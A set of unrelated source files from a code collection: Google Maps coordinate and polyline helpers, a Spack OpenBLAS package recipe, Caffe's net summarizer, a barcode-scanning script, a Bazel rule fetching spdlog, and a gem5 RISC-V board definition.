2) dict with two entries - "southwest" and "northeast". See convert.latlng
for information on how these can be represented.
For example:
sydney_bounds = {
"northeast" : {
"lat" : -33.4245981,
"lng" : 151.3426361
},
"southwest" : {
"lat" : -34.1692489,
"lng" : 150.502229
}
}
convert.bounds(sydney_bounds)
# '-34.169249,150.502229|-33.424598,151.342636'
:param arg: The bounds.
:type arg: dict
"""
if is_string(arg) and arg.count("|") == 1 and arg.count(",") == 2:
return arg
elif isinstance(arg, dict):
if "southwest" in arg and "northeast" in arg:
return "%s|%s" % (latlng(arg["southwest"]),
latlng(arg["northeast"]))
raise TypeError(
"Expected a bounds (southwest/northeast) dict, "
"but got %s" % type(arg).__name__)
def size(arg):
if isinstance(arg, int):
return "%sx%s" % (arg, arg)
elif _is_list(arg):
return "%sx%s" % (arg[0], arg[1])
raise TypeError(
"Expected a size int or list, "
"but got %s" % type(arg).__name__)
def decode_polyline(polyline):
"""Decodes a Polyline string into a list of lat/lng dicts.
See the developer docs for a detailed description of this encoding:
https://developers.google.com/maps/documentation/utilities/polylinealgorithm
:param polyline: An encoded polyline
:type polyline: string
:rtype: list of dicts with lat/lng keys
"""
points = []
index = lat = lng = 0
while index < len(polyline):
result = 1
shift = 0
while True:
b = ord(polyline[index]) - 63 - 1
index += 1
result += b << shift
shift += 5
if b < 0x1f:
break
lat += (~result >> 1) if (result & 1) != 0 else (result >> 1)
result = 1
shift = 0
while True:
b = ord(polyline[index]) - 63 - 1
index += 1
result += b << shift
shift += 5
if b < 0x1f:
break
lng += ~(result >> 1) if (result & 1) != 0 else (result >> 1)
points.append({"lat": lat * 1e-5, "lng": lng * 1e-5})
return points
def encode_polyline(points):
"""Encodes a list of points into a polyline string.
See the developer docs for a detailed description of this encoding:
https://developers.google.com/maps/documentation/utilities/polylinealgorithm
:param points: a list of lat/lng pairs
:type points: list of dicts or tuples
:rtype: string
"""
last_lat = last_lng = 0
result = ""
for point in points:
ll = normalize_lat_lng(point)
lat = int(round(ll[0] * 1e5))
lng = int(round(ll[1] * 1e5))
d_lat = lat - last_lat
d_lng = lng - last_lng
for v in [d_lat, d_lng]:
v = ~(v << 1) if v < 0 else v << 1
while v >= 0x20:
result += (chr((0x20 | (v & 0x1f)) + 63))
v >>= 5
result += (chr(v + 63))
last_lat = lat
last_lng = lng
return result
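# Rough sanity check, using the worked example from the algorithm page linked above:
# encode_polyline([(38.5, -120.2), (40.7, -120.95), (43.252, -126.453)]) should produce
# '_p~iF~ps|U_ulLnnqC_mqNvxq`@', and decode_polyline() of that string should recover the
# same coordinates up to the 1e-5 rounding inherent in the encoding.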
def shortest_path(locations):
"""Returns the shortest representation of the given locations.
The Elevations API limits requests to 2000 characters, and accepts
multiple locations either as pipe-delimited lat/lng values, or
an encoded polyline, so we determine which is shortest and use it.
:param locations: The lat/lng list.
:type locations: list
:rtype: string
"""
if isinstance(locations, tuple):
# Handle the single-tuple lat/lng case.
locations = [locations]
encoded = "enc:%s" % encode_polyline(locations)
unencoded = location_list(locations)
if len(encoded) < len(unencoded):
return encoded
else:
return unencoded
|
py | 7dfa98efd883546c08e4f0355e7e3784eab7f071 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
from spack.package_test import compare_output_file, compile_c_and_execute
import spack.architecture
class Openblas(MakefilePackage):
"""OpenBLAS: An optimized BLAS library"""
homepage = 'http://www.openblas.net'
url = 'http://github.com/xianyi/OpenBLAS/archive/v0.2.19.tar.gz'
git = 'https://github.com/xianyi/OpenBLAS.git'
version('develop', branch='develop')
version('0.3.7', sha256='bde136122cef3dd6efe2de1c6f65c10955bbb0cc01a520c2342f5287c28f9379')
version('0.3.6', sha256='e64c8fe083832ffbc1459ab6c72f71d53afd3b36e8497c922a15a06b72e9002f')
version('0.3.5', sha256='0950c14bd77c90a6427e26210d6dab422271bc86f9fc69126725833ecdaa0e85')
version('0.3.4', sha256='4b4b4453251e9edb5f57465bf2b3cf67b19d811d50c8588cdf2ea1f201bb834f')
version('0.3.3', sha256='49d88f4494ae780e3d7fa51769c00d982d7cdb73e696054ac3baa81d42f13bab')
version('0.3.2', sha256='e8ba64f6b103c511ae13736100347deb7121ba9b41ba82052b1a018a65c0cb15')
version('0.3.1', sha256='1f5e956f35f3acdd3c74516e955d797a320c2e0135e31d838cbdb3ea94d0eb33')
version('0.3.0', '42cde2c1059a8a12227f1e6551c8dbd2')
version('0.2.20', '48637eb29f5b492b91459175dcc574b1')
version('0.2.19', '28c998054fd377279741c6f0b9ea7941')
version('0.2.18', '805e7f660877d588ea7e3792cda2ee65')
version('0.2.17', '664a12807f2a2a7cda4781e3ab2ae0e1')
version('0.2.16', 'fef46ab92463bdbb1479dcec594ef6dc')
version('0.2.15', 'b1190f3d3471685f17cfd1ec1d252ac9')
variant(
'shared',
default=True,
description='Build shared libraries as well as static libs.'
)
variant('ilp64', default=False, description='64 bit integers')
variant('pic', default=True, description='Build position independent code')
variant('cpu_target', default='auto',
description='Set CPU target architecture (leave empty for '
'autodetection; GENERIC, SSE_GENERIC, NEHALEM, ...)')
variant(
'threads', default='none',
description='Multithreading support',
values=('pthreads', 'openmp', 'none'),
multi=False
)
variant(
'virtual_machine',
default=False,
description="Adding options to build openblas on Linux virtual machine"
)
variant(
'avx2',
default=True,
description='Enable use of AVX2 instructions'
)
variant(
'avx512',
default=False,
description='Enable use of AVX512 instructions'
)
# virtual dependency
provides('blas')
provides('lapack')
# OpenBLAS >=3.0 has an official way to disable internal parallel builds
patch('make.patch', when='@0.2.16:0.2.20')
# This patch is in a pull request to OpenBLAS that has not been handled
# https://github.com/xianyi/OpenBLAS/pull/915
# UPD: the patch has been merged starting version 0.2.20
patch('openblas_icc.patch', when='@:0.2.19%intel')
patch('openblas_icc_openmp.patch', when='@:0.2.20%[email protected]:')
patch('openblas_icc_fortran.patch', when='%[email protected]:')
patch('openblas_icc_fortran2.patch', when='%[email protected]:')
# Fixes compilation error on POWER8 with GCC 7
# https://github.com/xianyi/OpenBLAS/pull/1098
patch('power8.patch', when='@0.2.18:0.2.19 %[email protected]: target=power8')
# Change file comments to work around clang 3.9 assembler bug
# https://github.com/xianyi/OpenBLAS/pull/982
patch('openblas0.2.19.diff', when='@0.2.19')
# Fix CMake export symbol error
# https://github.com/xianyi/OpenBLAS/pull/1703
patch('openblas-0.3.2-cmake.patch', when='@0.3.1:0.3.2')
# Disable experimental TLS code that lead to many threading issues
# https://github.com/xianyi/OpenBLAS/issues/1735#issuecomment-422954465
# https://github.com/xianyi/OpenBLAS/issues/1761#issuecomment-421039174
# https://github.com/xianyi/OpenBLAS/pull/1765
patch('https://github.com/xianyi/OpenBLAS/commit/4d183e5567346f80f2ef97eb98f8601c47f8cb56.patch',
sha256='714aea33692304a50bd0ccde42590c176c82ded4a8ac7f06e573dc8071929c33',
when='@0.3.3')
# Fix parallel build issues on filesystems
# with missing sub-second timestamp resolution
patch('https://github.com/xianyi/OpenBLAS/commit/79ea839b635d1fd84b6ce8a47e086f01d64198e6.patch',
sha256='f1b066a4481a50678caeb7656bf3e6764f45619686ac465f257c8017a2dc1ff0',
when='@0.3.0:0.3.3')
# Add conditions to f_check to determine the Fujitsu compiler
patch('openblas_fujitsu.patch', when='%fj')
conflicts('%intel@16', when='@0.2.15:0.2.19')
@property
def parallel(self):
# unclear whether setting `-j N` externally was supported before 0.3
return self.spec.version >= Version('0.3.0')
@run_before('edit')
def check_compilers(self):
# As of 06/2016 there is no mechanism to specify that packages which
# depends on Blas/Lapack need C or/and Fortran symbols. For now
# require both.
if self.compiler.fc is None:
raise InstallError(
'OpenBLAS requires both C and Fortran compilers!'
)
# Add support for OpenMP
if (self.spec.satisfies('threads=openmp') and
self.spec.satisfies('%clang')):
if str(self.spec.compiler.version).endswith('-apple'):
raise InstallError("Apple's clang does not support OpenMP")
if '@:0.2.19' in self.spec:
# Openblas (as of 0.2.19) hardcoded that OpenMP cannot
# be used with any (!) compiler named clang, bummer.
raise InstallError(
'OpenBLAS @:0.2.19 does not support OpenMP with clang!'
)
@property
def make_defs(self):
# Configure fails to pick up fortran from FC=/abs/path/to/fc, but
# works fine with FC=/abs/path/to/gfortran.
# When mixing compilers make sure that
# $SPACK_ROOT/lib/spack/env/<compiler> have symlinks with reasonable
# names and hack them inside lib/spack/spack/compilers/<compiler>.py
make_defs = [
'CC={0}'.format(spack_cc),
'FC={0}'.format(spack_fc),
]
# force OpenBLAS to use externally defined parallel build
if self.spec.version < Version('0.3'):
make_defs.append('MAKE_NO_J=1') # flag defined by our make.patch
else:
make_defs.append('MAKE_NB_JOBS=0') # flag provided by OpenBLAS
if self.spec.variants['virtual_machine'].value:
make_defs += [
'DYNAMIC_ARCH=1',
'NUM_THREADS=64', # OpenBLAS stores the number of CPUs present at build time as the maximum
]
if self.spec.variants['cpu_target'].value != 'auto':
make_defs += [
'TARGET={0}'.format(self.spec.variants['cpu_target'].value)
]
# invoke make with the correct TARGET for aarch64
elif 'aarch64' in spack.architecture.sys_type():
make_defs += [
'TARGET=ARMV8'
]
if self.spec.satisfies('%gcc@:4.8.4'):
make_defs += ['NO_AVX2=1']
if '~shared' in self.spec:
if '+pic' in self.spec:
make_defs.extend([
'CFLAGS={0}'.format(self.compiler.pic_flag),
'FFLAGS={0}'.format(self.compiler.pic_flag)
])
make_defs += ['NO_SHARED=1']
# fix missing _dggsvd_ and _sggsvd_
if self.spec.satisfies('@0.2.16'):
make_defs += ['BUILD_LAPACK_DEPRECATED=1']
# Add support for multithreading
if self.spec.satisfies('threads=openmp'):
make_defs += ['USE_OPENMP=1', 'USE_THREAD=1']
elif self.spec.satisfies('threads=pthreads'):
make_defs += ['USE_OPENMP=0', 'USE_THREAD=1']
else:
make_defs += ['USE_OPENMP=0', 'USE_THREAD=0']
# 64bit ints
if '+ilp64' in self.spec:
make_defs += ['INTERFACE64=1']
if self.spec.target.family == 'x86_64':
if '~avx2' in self.spec:
make_defs += ['NO_AVX2=1']
if '~avx512' in self.spec:
make_defs += ['NO_AVX512=1']
return make_defs
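# For example, a hypothetical spec such as `openblas@0.3.7 threads=openmp ~shared +pic ~ilp64`
# would yield roughly: CC/FC pointing at Spack's compiler wrappers, MAKE_NB_JOBS=0,
# CFLAGS/FFLAGS set to the PIC flag, NO_SHARED=1, USE_OPENMP=1 and USE_THREAD=1, with
# NO_AVX2/NO_AVX512 added only when those variants are disabled on an x86_64 target.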
@property
def headers(self):
# As in netlib-lapack, the only public headers for cblas and lapacke in
# openblas are cblas.h and lapacke.h. The remaining headers are private
# headers either included in one of these two headers, or included in
# one of the source files implementing functions declared in these
# headers.
return find_headers(['cblas', 'lapacke'], self.prefix.include)
@property
def build_targets(self):
targets = ['libs', 'netlib']
# Build shared if variant is set.
if '+shared' in self.spec:
targets += ['shared']
return self.make_defs + targets
@run_after('build')
@on_package_attributes(run_tests=True)
def check_build(self):
make('tests', *self.make_defs, parallel=False)
@property
def install_targets(self):
make_args = [
'install',
'PREFIX={0}'.format(self.prefix),
]
return make_args + self.make_defs
@run_after('install')
@on_package_attributes(run_tests=True)
def check_install(self):
spec = self.spec
# Openblas may pass its own test but still fail to compile Lapack
# symbols. To make sure we get working Blas and Lapack, do a small
# test.
source_file = join_path(os.path.dirname(self.module.__file__),
'test_cblas_dgemm.c')
blessed_file = join_path(os.path.dirname(self.module.__file__),
'test_cblas_dgemm.output')
include_flags = spec['openblas'].headers.cpp_flags
link_flags = spec['openblas'].libs.ld_flags
if self.compiler.name == 'intel':
link_flags += ' -lifcore'
if self.spec.satisfies('threads=pthreads'):
link_flags += ' -lpthread'
if spec.satisfies('threads=openmp'):
link_flags += ' -lpthread ' + self.compiler.openmp_flag
output = compile_c_and_execute(
source_file, [include_flags], link_flags.split()
)
compare_output_file(output, blessed_file)
|
py | 7dfa9ae250a9dedf120694a7bbca68fcb05f1d17 | # pylint: skip-file
#
# All modification made by Intel Corporation: Copyright (c) 2016 Intel Corporation
#
# All contributions by the University of California:
# Copyright (c) 2014, 2015, The Regents of the University of California (Regents)
# All rights reserved.
#
# All other contributions:
# Copyright (c) 2014, 2015, the respective contributors
# All rights reserved.
# For the list of contributors go to https://github.com/BVLC/caffe/blob/master/CONTRIBUTORS.md
#
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
"""Net summarization tool.
This tool summarizes the structure of a net in a concise but comprehensive
tabular listing, taking a prototxt file as input.
Use this tool to check at a glance that the computation you've specified is the
computation you expect.
"""
from caffe.proto import caffe_pb2
from google.protobuf import text_format
import re
import argparse
# ANSI codes for coloring blobs (used cyclically)
COLORS = ['92', '93', '94', '95', '97', '96', '42', '43;30', '100',
'444', '103;30', '107;30']
DISCONNECTED_COLOR = '41'
def read_net(filename):
net = caffe_pb2.NetParameter()
with open(filename) as f:
text_format.Parse(f.read(), net)
return net
def format_param(param):
out = []
if len(param.name) > 0:
out.append(param.name)
if param.lr_mult != 1:
out.append('x{}'.format(param.lr_mult))
if param.decay_mult != 1:
out.append('Dx{}'.format(param.decay_mult))
return ' '.join(out)
def printed_len(s):
return len(re.sub(r'\033\[[\d;]+m', '', s))
def print_table(table, max_width):
"""Print a simple nicely-aligned table.
table must be a list of (equal-length) lists. Columns are space-separated,
and as narrow as possible, but no wider than max_width. Text may overflow
columns; note that unlike string.format, this will not affect subsequent
columns, if possible."""
max_widths = [max_width] * len(table[0])
column_widths = [max(printed_len(row[j]) + 1 for row in table)
for j in range(len(table[0]))]
column_widths = [min(w, max_w) for w, max_w in zip(column_widths, max_widths)]
for row in table:
row_str = ''
right_col = 0
for cell, width in zip(row, column_widths):
right_col += width
row_str += cell + ' '
row_str += ' ' * max(right_col - printed_len(row_str), 0)
print(row_str)
def summarize_net(net):
disconnected_tops = set()
for lr in net.layer:
disconnected_tops |= set(lr.top)
disconnected_tops -= set(lr.bottom)
table = []
colors = {}
for lr in net.layer:
tops = []
for ind, top in enumerate(lr.top):
color = colors.setdefault(top, COLORS[len(colors) % len(COLORS)])
if top in disconnected_tops:
top = '\033[1;4m' + top
if len(lr.loss_weight) > 0:
top = '{} * {}'.format(lr.loss_weight[ind], top)
tops.append('\033[{}m{}\033[0m'.format(color, top))
top_str = ', '.join(tops)
bottoms = []
for bottom in lr.bottom:
color = colors.get(bottom, DISCONNECTED_COLOR)
bottoms.append('\033[{}m{}\033[0m'.format(color, bottom))
bottom_str = ', '.join(bottoms)
if lr.type == 'Python':
type_str = lr.python_param.module + '.' + lr.python_param.layer
else:
type_str = lr.type
# Summarize conv/pool parameters.
# TODO support rectangular/ND parameters
conv_param = lr.convolution_param
if (lr.type in ['Convolution', 'Deconvolution']
and len(conv_param.kernel_size) == 1):
arg_str = str(conv_param.kernel_size[0])
if len(conv_param.stride) > 0 and conv_param.stride[0] != 1:
arg_str += '/' + str(conv_param.stride[0])
if len(conv_param.pad) > 0 and conv_param.pad[0] != 0:
arg_str += '+' + str(conv_param.pad[0])
arg_str += ' ' + str(conv_param.num_output)
if conv_param.group != 1:
arg_str += '/' + str(conv_param.group)
elif lr.type == 'Pooling':
arg_str = str(lr.pooling_param.kernel_size)
if lr.pooling_param.stride != 1:
arg_str += '/' + str(lr.pooling_param.stride)
if lr.pooling_param.pad != 0:
arg_str += '+' + str(lr.pooling_param.pad)
else:
arg_str = ''
if len(lr.param) > 0:
param_strs = list(map(format_param, lr.param))
if max(map(len, param_strs)) > 0:
param_str = '({})'.format(', '.join(param_strs))
else:
param_str = ''
else:
param_str = ''
table.append([lr.name, type_str, param_str, bottom_str, '->', top_str,
arg_str])
return table
def main():
parser = argparse.ArgumentParser(description="Print a concise summary of net computation.")
parser.add_argument('filename', help='net prototxt file to summarize')
parser.add_argument('-w', '--max-width', help='maximum field width',
type=int, default=30)
args = parser.parse_args()
net = read_net(args.filename)
table = summarize_net(net)
print_table(table, max_width=args.max_width)
if __name__ == '__main__':
main()
|
py | 7dfa9b19e8bfbdf651281734129d722a34caa270 | from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("Ridge" , "diabetes" , "oracle")
|
py | 7dfa9c9bef61d0ca98da1b1d5516b5aa676e20ac | # USAGE
# python barcode_scanner_image.py --image barcode_example.png
# import the necessary packages
from pyzbar import pyzbar
import argparse
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
help="path to input image")
args = vars(ap.parse_args())
# load the input image
image = cv2.imread(args["image"])
# find the barcodes in the image and decode each of the barcodes
barcodes = pyzbar.decode(image)
# loop over the detected barcodes
for barcode in barcodes:
# extract the bounding box location of the barcode and draw the
# bounding box surrounding the barcode on the image
(x, y, w, h) = barcode.rect
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)
# the barcode data is a bytes object so if we want to draw it on
# our output image we need to convert it to a string first
barcodeData = barcode.data.decode("utf-8")
barcodeType = barcode.type
# draw the barcode data and barcode type on the image
text = "{} ({})".format(barcodeData, barcodeType)
cv2.putText(image, text, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 255), 2)
# show the output image
cv2.imshow("Image", image)
cv2.waitKey(0) |
bzl | 7dfa9d8b2367ee70b7cd9a78153860511747511f | """Loads the cpuinfo library, used by XNNPACK."""
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def repo():
http_archive(
name = "spdlog",
strip_prefix = "spdlog-1.8.2",
urls = ["https://github.com/gabime/spdlog/archive/v1.8.2.tar.gz"],
sha256 = "e20e6bd8f57e866eaf25a5417f0a38a116e537f1a77ac7b5409ca2b180cec0d5",
build_file = "@//third_party/spdlog:spdlog.BUILD",
)
|
py | 7dfa9db2d9908981a0bec1c734398722844cc954 | # Copyright (c) 2021 The Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from typing import List
from ...utils.override import overrides
from .abstract_board import AbstractBoard
from .kernel_disk_workload import KernelDiskWorkload
from ..processors.abstract_processor import AbstractProcessor
from ..memory.abstract_memory_system import AbstractMemorySystem
from ..cachehierarchies.abstract_cache_hierarchy import AbstractCacheHierarchy
from ...resources.resource import AbstractResource
from ...isas import ISA
from ...utils.requires import requires
import m5
from m5.objects import (
BadAddr,
Bridge,
PMAChecker,
RiscvLinux,
AddrRange,
IOXBar,
RiscvRTC,
HiFive,
CowDiskImage,
RawDiskImage,
RiscvMmioVirtIO,
VirtIOBlock,
VirtIORng,
Frequency,
Port,
)
from m5.util.fdthelper import (
Fdt,
FdtNode,
FdtProperty,
FdtPropertyStrings,
FdtPropertyWords,
FdtState,
)
class RiscvBoard(AbstractBoard, KernelDiskWorkload):
"""
A board capable of full system simulation for RISC-V
At a high-level, this is based on the HiFive Unmatched board from SiFive.
This board assumes that you will be booting Linux.
**Limitations**
* Only works with classic caches
"""
def __init__(
self,
clk_freq: str,
processor: AbstractProcessor,
memory: AbstractMemorySystem,
cache_hierarchy: AbstractCacheHierarchy,
) -> None:
super().__init__(clk_freq, processor, memory, cache_hierarchy)
requires(isa_required=ISA.RISCV)
@overrides(AbstractBoard)
def _setup_board(self) -> None:
self.workload = RiscvLinux()
# Contains a CLINT, PLIC, UART, and some functions for the dtb, etc.
self.platform = HiFive()
# Note: This only works with single threaded cores.
self.platform.plic.n_contexts = self.processor.get_num_cores() * 2
self.platform.attachPlic()
self.platform.clint.num_threads = self.processor.get_num_cores()
# Add the RTC
# TODO: Why 100MHz? Does something else need to change when this does?
self.platform.rtc = RiscvRTC(frequency=Frequency("100MHz"))
self.platform.clint.int_pin = self.platform.rtc.int_pin
# Incoherent I/O bus
self.iobus = IOXBar()
self.iobus.badaddr_responder = BadAddr()
self.iobus.default = self.iobus.badaddr_responder.pio
# The virtio disk
self.disk = RiscvMmioVirtIO(
vio=VirtIOBlock(),
interrupt_id=0x8,
pio_size=4096,
pio_addr=0x10008000,
)
# The virtio rng
self.rng = RiscvMmioVirtIO(
vio=VirtIORng(),
interrupt_id=0x8,
pio_size=4096,
pio_addr=0x10007000,
)
# Note: This overrides the platform's code because the platform isn't
# general enough.
self._on_chip_devices = [self.platform.clint, self.platform.plic]
self._off_chip_devices = [self.platform.uart, self.disk, self.rng]
def _setup_io_devices(self) -> None:
"""Connect the I/O devices to the I/O bus"""
if self.get_cache_hierarchy().is_ruby():
for device in self._off_chip_devices + self._on_chip_devices:
device.pio = self.iobus.mem_side_ports
else:
for device in self._off_chip_devices:
device.pio = self.iobus.mem_side_ports
for device in self._on_chip_devices:
device.pio = self.get_cache_hierarchy().get_mem_side_port()
self.bridge = Bridge(delay="10ns")
self.bridge.mem_side_port = self.iobus.cpu_side_ports
self.bridge.cpu_side_port = (
self.get_cache_hierarchy().get_mem_side_port()
)
self.bridge.ranges = [
AddrRange(dev.pio_addr, size=dev.pio_size)
for dev in self._off_chip_devices
]
def _setup_pma(self) -> None:
"""Set the PMA devices on each core"""
uncacheable_range = [
AddrRange(dev.pio_addr, size=dev.pio_size)
for dev in self._on_chip_devices + self._off_chip_devices
]
# TODO: Not sure if this should be done per-core like in the example
for cpu in self.get_processor().get_cores():
cpu.get_mmu().pma_checker = PMAChecker(
uncacheable=uncacheable_range
)
@overrides(AbstractBoard)
def has_dma_ports(self) -> bool:
return False
@overrides(AbstractBoard)
def get_dma_ports(self) -> List[Port]:
raise NotImplementedError(
"RISCVBoard does not have DMA Ports. "
"Use `has_dma_ports()` to check this."
)
@overrides(AbstractBoard)
def has_io_bus(self) -> bool:
return True
@overrides(AbstractBoard)
def get_io_bus(self) -> IOXBar:
return self.iobus
@overrides(AbstractBoard)
def has_coherent_io(self) -> bool:
return True
@overrides(AbstractBoard)
def get_mem_side_coherent_io_port(self) -> Port:
return self.iobus.mem_side_ports
@overrides(AbstractBoard)
def _setup_memory_ranges(self):
memory = self.get_memory()
mem_size = memory.get_size()
self.mem_ranges = [AddrRange(start=0x80000000, size=mem_size)]
memory.set_memory_range(self.mem_ranges)
def generate_device_tree(self, outdir: str) -> None:
"""Creates the dtb and dts files.
Creates two files in the outdir: 'device.dtb' and 'device.dts'
:param outdir: Directory to output the files
"""
state = FdtState(addr_cells=2, size_cells=2, cpu_cells=1)
root = FdtNode("/")
root.append(state.addrCellsProperty())
root.append(state.sizeCellsProperty())
root.appendCompatible(["riscv-virtio"])
for mem_range in self.mem_ranges:
node = FdtNode("memory@%x" % int(mem_range.start))
node.append(FdtPropertyStrings("device_type", ["memory"]))
node.append(
FdtPropertyWords(
"reg",
state.addrCells(mem_range.start)
+ state.sizeCells(mem_range.size()),
)
)
root.append(node)
# See Documentation/devicetree/bindings/riscv/cpus.txt for details.
cpus_node = FdtNode("cpus")
cpus_state = FdtState(addr_cells=1, size_cells=0)
cpus_node.append(cpus_state.addrCellsProperty())
cpus_node.append(cpus_state.sizeCellsProperty())
# Used by the CLINT driver to set the timer frequency. Value taken from
# RISC-V kernel docs (Note: freedom-u540 is actually 1MHz)
cpus_node.append(FdtPropertyWords("timebase-frequency", [10000000]))
for i, core in enumerate(self.get_processor().get_cores()):
node = FdtNode(f"cpu@{i}")
node.append(FdtPropertyStrings("device_type", "cpu"))
node.append(FdtPropertyWords("reg", state.CPUAddrCells(i)))
node.append(FdtPropertyStrings("mmu-type", "riscv,sv48"))
node.append(FdtPropertyStrings("status", "okay"))
node.append(FdtPropertyStrings("riscv,isa", "rv64imafdc"))
# TODO: Should probably get this from the core.
freq = self.clk_domain.clock[0].frequency
node.append(FdtPropertyWords("clock-frequency", freq))
node.appendCompatible(["riscv"])
int_phandle = state.phandle(f"cpu@{i}.int_state")
node.appendPhandle(f"cpu@{i}")
int_node = FdtNode("interrupt-controller")
int_state = FdtState(interrupt_cells=1)
int_phandle = int_state.phandle(f"cpu@{i}.int_state")
int_node.append(int_state.interruptCellsProperty())
int_node.append(FdtProperty("interrupt-controller"))
int_node.appendCompatible("riscv,cpu-intc")
int_node.append(FdtPropertyWords("phandle", [int_phandle]))
node.append(int_node)
cpus_node.append(node)
root.append(cpus_node)
soc_node = FdtNode("soc")
soc_state = FdtState(addr_cells=2, size_cells=2)
soc_node.append(soc_state.addrCellsProperty())
soc_node.append(soc_state.sizeCellsProperty())
soc_node.append(FdtProperty("ranges"))
soc_node.appendCompatible(["simple-bus"])
# CLINT node
clint = self.platform.clint
clint_node = clint.generateBasicPioDeviceNode(
soc_state, "clint", clint.pio_addr, clint.pio_size
)
int_extended = list()
for i, core in enumerate(self.get_processor().get_cores()):
phandle = soc_state.phandle(f"cpu@{i}.int_state")
int_extended.append(phandle)
int_extended.append(0x3)
int_extended.append(phandle)
int_extended.append(0x7)
clint_node.append(
FdtPropertyWords("interrupts-extended", int_extended)
)
clint_node.appendCompatible(["riscv,clint0"])
soc_node.append(clint_node)
# PLIC node
plic = self.platform.plic
plic_node = plic.generateBasicPioDeviceNode(
soc_state, "plic", plic.pio_addr, plic.pio_size
)
int_state = FdtState(addr_cells=0, interrupt_cells=1)
plic_node.append(int_state.addrCellsProperty())
plic_node.append(int_state.interruptCellsProperty())
phandle = int_state.phandle(plic)
plic_node.append(FdtPropertyWords("phandle", [phandle]))
plic_node.append(FdtPropertyWords("riscv,ndev", [plic.n_src - 1]))
int_extended = list()
for i, core in enumerate(self.get_processor().get_cores()):
phandle = state.phandle(f"cpu@{i}.int_state")
int_extended.append(phandle)
int_extended.append(0xB)
int_extended.append(phandle)
int_extended.append(0x9)
plic_node.append(FdtPropertyWords("interrupts-extended", int_extended))
plic_node.append(FdtProperty("interrupt-controller"))
plic_node.appendCompatible(["riscv,plic0"])
soc_node.append(plic_node)
# UART node
uart = self.platform.uart
uart_node = uart.generateBasicPioDeviceNode(
soc_state, "uart", uart.pio_addr, uart.pio_size
)
uart_node.append(
FdtPropertyWords("interrupts", [self.platform.uart_int_id])
)
uart_node.append(FdtPropertyWords("clock-frequency", [0x384000]))
uart_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
uart_node.appendCompatible(["ns8250"])
soc_node.append(uart_node)
# VirtIO MMIO disk node
disk = self.disk
disk_node = disk.generateBasicPioDeviceNode(
soc_state, "virtio_mmio", disk.pio_addr, disk.pio_size
)
disk_node.append(FdtPropertyWords("interrupts", [disk.interrupt_id]))
disk_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
disk_node.appendCompatible(["virtio,mmio"])
soc_node.append(disk_node)
# VirtIO MMIO rng node
rng = self.rng
rng_node = rng.generateBasicPioDeviceNode(
soc_state, "virtio_mmio", rng.pio_addr, rng.pio_size
)
rng_node.append(FdtPropertyWords("interrupts", [rng.interrupt_id]))
rng_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
rng_node.appendCompatible(["virtio,mmio"])
soc_node.append(rng_node)
root.append(soc_node)
fdt = Fdt()
fdt.add_rootnode(root)
fdt.writeDtsFile(os.path.join(outdir, "device.dts"))
